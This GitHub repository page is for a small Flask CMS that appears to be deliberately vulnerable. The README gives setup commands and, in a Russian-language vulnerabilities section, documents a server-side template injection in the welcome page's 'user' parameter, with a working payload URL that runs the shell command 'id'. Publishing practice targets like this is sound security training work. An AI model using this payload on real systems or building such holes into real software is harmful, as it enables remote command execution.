Skip to content

takyoni/flask_cms

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

services platforms author
app-service\web,app-service
python
cephalin
pip install -r requirements.txt
cd app
flask db upgrade && flask run -h 0.0.0.0 -p 5000

Логи сохраняются в app/record.log Tested on python 3.8.3

Config

Приложение конфигурируется через файл app.env или через переменные окружения

Уязвимости

На страницу welcome в параметре user есть ssti. Пример: http://localhost:5000/welcome?user={{request.application.__globals__.__builtins__.__import__(%27os%27).popen(%27id%27).read()}}

Contributing

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact [email protected] with any additional questions or comments.

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published